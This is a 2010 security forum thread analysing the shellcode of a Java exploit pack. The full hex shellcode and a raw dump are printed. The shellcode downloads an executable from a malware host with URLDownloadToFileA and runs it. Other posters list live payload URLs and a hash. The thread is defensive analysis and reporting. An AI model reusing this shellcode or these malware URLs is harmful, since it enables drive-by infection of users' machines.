Author Topic: Shellcode analysis? (Read 5555 times)

Garlando · February 13, 2010, 06:15:06 am

hi
i was investigating a java exploit, and decided to take a look at the shellcode

505351525657559CE8000000005D83ED0D31C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D60100005F5E89EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356302000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C278020000526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C30000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666ADC1E00203851F02000089C6AD03851B020000C3EB100000000000000000000000000000000089851B0200005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C6541007064667570642E6578650063726173682E70687000687474703A2F2F3139322E616E74697672323030392E636E2F73656E632E657865009026

Code: [Select]

PSQRVWU�è����]�í
1Àd@0x�@�p�@ë	�@4�@|�@<VW¾^��î¿N��ïèÖ��_^�ê�Â^��Rh����ÿ�N���ê�Â^��1öÂ��5c���û�t�2FëîÆ2��ê�ÂE��Rÿ�R���ê�ÂP��RPÿ�V��j�j��ê�Â^��R�ê�Âx��Rj�ÿÐj�ê�Â^��Rÿ�Z���ê�Â^��Rh����ÿ�N���ê�Â^��1öÂ��5n���û�t�2FëîÆ2��ê�ÂE��Rÿ�R���ê�ÂP��RPÿ�V��j�j��ê�Â^��R�ê�Â¦��Rj�ÿÐj�ê�Â^��Rÿ�Z���]_^ZY[XÃ����������������GetTempPathA�LoadLibraryA�GetProcAddress�WinExec�»�ò�÷0À®uý)÷�ù1À¾<���µ��f����px�Æµ���½�����«���P«���«^1ÛV����Æ�×Qüó¦Yt^Cëé^�Ñà�'��1ö�fÁà����Æ���Ãë��������������������VWèXÿÿÿ_^«Î�>»tëíÃURLMON.DLL�URLDownloadToFileA�pdfupd.exe�crash.php�http://192.antivr2009.cn/senc.exe��&

it uses URLDownloadToFileA to download the malware as pdfupd.exe from hxxp://192.antivr2009.cn/senc.exe
but what left me wondering is the string 'crash.php' can anyone explain to me the purpose of this string, i'm not very talented in analysing malware so if anyone can clarify this to me i'd be very happy

thanks Garland

MysteryFCM · February 14, 2010, 09:37:00 pm

What's the URL that houses this?

Garlando · February 15, 2010, 12:17:11 pm

Quote from: MysteryFCM on February 14, 2010, 09:37:00 pm

What's the URL that houses this?

it's down now, but this site offers the same exploit pack

Code: [Select]

miamiheraldsi.com/in0/index.php
its in the params of the java exploit

MysteryFCM · February 15, 2010, 01:24:44 pm

Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are;

Code: [Select]

http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

SysAdMini · February 15, 2010, 01:29:07 pm

Quote from: MysteryFCM on February 15, 2010, 01:24:44 pm

Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are;

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7 http://miamiheraldsi.com/in0/l.php?i=14
Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

Added this morning.

http://www.malwaredomainlist.com/mdl.php?search=miamiheraldsi.com&colsearch=All&quantity=50

Garlando · February 15, 2010, 01:39:29 pm

Quote from: MysteryFCM on February 15, 2010, 01:24:44 pm

Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are;

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7 http://miamiheraldsi.com/in0/l.php?i=14
Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

sorry i mean the param tags in the decoded javascript

<applet src=gsb50.jar ....something other....>
<param name='sc' value='the shellcode'>
</applet>

MysteryFCM · February 15, 2010, 01:43:02 pm

hehe cool

(related to learn-to-knit.com (site that led me to it)). I've just added the payload URL's to MDL

(just got back home so finally able to analyze it)

@Garlando,
There's actually two. The first (and commented out for some reason (likely because of the second one), points to l.php?i=10, the second points to i=9. Again however, I can't find any reference or active URL for pdfupd.exe (not ran it on the test machine yet, but guessing pdfupd.exe is the filename it's downloaded as) nor crash.php.

Author Topic: Shellcode analysis? (Read 5555 times)

Garlando

Shellcode analysis?

MysteryFCM

Re: Shellcode analysis?

Garlando

Re: Shellcode analysis?

MysteryFCM

Re: Shellcode analysis?

SysAdMini

Re: Shellcode analysis?

Garlando

Re: Shellcode analysis?

MysteryFCM

Re: Shellcode analysis?